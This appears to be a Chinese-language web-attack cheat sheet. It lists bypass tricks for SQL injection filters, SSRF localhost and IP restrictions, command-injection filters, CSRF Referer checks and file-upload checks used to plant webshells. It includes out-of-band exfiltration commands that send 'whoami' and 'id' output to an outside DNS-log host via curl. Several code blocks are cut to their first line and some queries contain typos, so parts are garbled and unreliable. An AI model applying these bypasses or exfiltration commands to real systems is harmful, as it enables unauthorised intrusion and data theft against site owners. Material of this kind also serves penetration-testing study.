Web中常见的绕过和技巧
SQL注入
十六进制绕过引号
1 | slect table_name from information_schema.table where table_schema="sqli"; |
like或者in绕过等号
1 | select * from admin where id in (1,2,3,4); |
join绕过逗号
1 | SELECT * FROM admin where id = 1 union select 1,2,group_concat(user(),' ',database(),' ',@@datadir) |
limit逗号的绕过
1 | select * from admin limit 0,2; |
between绕过等号
1 | select * from admin where id between 1 and 3; |
空格绕过
1 | select * from admin where id=1; |
符号代替文字绕过
&&代替and
||代替or
| 代替 xor
MySQL注释
SELECT * FROM Users WHERE id =’1’AND MID(VERSION()1,1)=’5’;
等价函数替换
1 | hex()、bin() ==> ascii() |
SSRF
限制协议绕过
通过HTTP(S)的链接302跳转到gopher协议上。
1 | <?php |
1 | # dict protocol - 探测Redis |
IP限制绕过
利用[::]
1 | 利用[::]绕过localhost |
在windows尝试了chrome Firefox IE
都无法访问
在Linux下Firefox
是可以访问的。
Linux下curl wget
也是可以访问的。
利用@
1 | http://example.com@127.0.0.1 => http://127.0.0.1 |
在firefox
下会弹出提示框。chrome
直接跳转。
利用短地址
1 | http://dwz.cn/11SMa >>> http://127.0.0.1 |
利用xip.io和xip.name
1 | 10.0.0.1.xip.io 10.0.0.1 |
利用DNS解析
在域名上设置A记录,指向127.0.1
利用进制转换
1 | 十进制 ---||||||> 十六进制 ---||||||> 八进制 然后在访问时 指定协议然后加个0 |
利用Enclosed alphanumerics
1 | 利用Enclosed alphanumerics |
利用句号
1 | 127。0。0。1 >>> 127.0.0.1 |
命令执行
空格绕过
1 | < 符号 |
1 | %0a 符号 |
变量形式绕过
1 | a=who;b=am;c=i;$a$b$c |
base64编码
1 | `echo "d2hvYW1p"|base64 -d` |
DNS通道获取回显
linux:
1 | curl xxxx.ceye.io/`whoami` |
特殊字符或者是空格出现的话,这时候可以通过一些编码来,比如base64
1 | curl http://xxxx.ceye.io/$(id|base64) |
windows:
1 | http请求: |
1 | dns请求: |
用ceye.io
获取不到回显,尝试了用t00ls的T00ls DNSLOG
单引号和双引号
单引号双引号要成对出现
CSRF 绕过Referer
条件限制 不一定所有的Refere验证就可以绕过
Referer为空条件下
利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的
如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是空的。
利用https协议 https向http跳转的时候Referer为空
判断Referer是某域情况下绕过
比如你找的csrf是xxx.com 验证的referer是验证的*.xx.com
可以找个二级域名 之后 之后在把文章地址发出去 就可以伪造。
判断Referer是否存在某关键词
referer判断存在不存在google.com这个关键词
在网站新建一个google.com目录 把CSRF存放在google.com目录,即可绕过
判断referer是否有某域名
判断了Referer开头是否以126.com以及126子域名 不验证根域名为126.com
那么我这里可以构造子域名x.126.com.xxx.com
文件上传
解析漏洞
IIS6.0解析漏洞
IIS6.0会把以下3种类型的文件会被IIS当作脚本文件(ASP、PHP、ASPX)来解析执行
a.asp;.jpg
/a.asp/2018042500310015.jpg
a.cer、a.asa、a.cdx IIS6.0会把这三种后缀当作ASP来执行。
Apache解析漏洞
在低版本的Apache中,系统会从右向左识别后缀,直至找到一个可以识别的后缀,然后将文件以该可识别的后缀进行解析。
1 | shell.php.v1.xxx |
Nginx解析漏洞
Nginx<=0.8.37,在已上传到服务器的包含WEBSHELL代码的图片后面加上%00.php会将 /xx.jpg%00.php当作PHP文件来进行解析执行。
CGI解析漏洞
CGI的解析漏洞主要影响IIS>7.0 和 Nginx 这两个WEB容器,它的产生原因是因为PHP.ini中cgi.fix_pathinfo=1,从而导致把其他格式文件按照PHP脚本来进行解析执行。
Payload:
1 | http://IP/图片马地址/a.php |
遇到这种环境,攻击者只需要找到一个上传点,然后上传一个图片马,然后访问图片构造Payload即可获取WEBSHELL。但此情景只能以PHP脚本解析执行文件。
客户端检测绕过(JavaScript检测)
这类检测通常在上传页面里含有专门检测文件上传的javascript代码最常见的就是检测扩展名是否合法
可以用firebug之类的插件把它禁掉或者通过burp之类的代理工具进行绕过提交
用burp进行代理修改先将文件扩展名改成jpg
服务端检测绕过(MIME检测)
MIME验证是通过获取上传文件时数据包中Content-Type的值来判断文件是否合法的。以下是常见图片的后缀和Content-Type对应表:
1 | 后缀 Content-Type |
MIME验证只需要攻击者抓取上传数据包,将数据包中的Content-Type的值修改为合法图片的Content-Type值即可绕过。
服务端检测绕过(目录路径检测)
目录路径检测,一般就检测路径是否合法
洞成因是因为对目录路径的检测不够严谨而导致可以用0x00截断进行攻击
服务端检测绕过(文件扩展名检测)
文件名大小写绕过
名单列表绕过
特殊文件名绕过
0x00截断绕过
htaccess文件攻击
解析调用/漏洞绕过
服务端检测绕过(文件内容检测)
- 文件幻数检测
- 文件相关信息检测
图像文件相关信息检测常用的就是getimagesize()函数只需要把文件头部分伪造好就ok了,
就是在幻数的基础上还加了一些文件信息有点像下面的结构
1 | GIF89a |
- 文件加载检测
常见的是图像渲染测试,再变态点的甚至是进行二次渲染
对渲染/加载测试的攻击方式是代码注入绕过
对二次渲染的攻击方式是攻击文件加载器自身
渲染/加载测试攻击-代码注入绕过
可以用图像处理软件对一张图片进行代码注入
用winhex看数据可以分析出这类工具的原理是
在不破坏文件本身的渲染情况下
找一个空白区进行填充代码,
一般会是图片的注释区对于渲染测试基本上都能绕过,毕竟本身的文件结构是完整的